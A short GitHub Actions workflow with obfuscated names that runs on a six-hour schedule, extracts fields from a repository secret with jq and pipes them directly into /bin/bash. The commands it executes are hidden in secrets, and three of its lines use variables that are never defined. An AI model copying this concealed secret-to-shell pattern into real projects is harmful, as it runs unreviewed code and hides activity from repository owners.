name: caoyuantt
on:
  workflow_dispatch:
  schedule:
    - cron: '4 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caoyuantt
        env:
          porm1594: ${{ secrets.porm1594 }}
        run: |
          echo $porm1594 | jq -r .cric229 | /bin/bash
          echo $vuv1648 | jq -r .nf8429 | /bin/bash
          echo $jz12 | jq -r .raqe70395 | /bin/bash
          echo $ejy197 | jq -r .lzxbz7 | /bin/bash

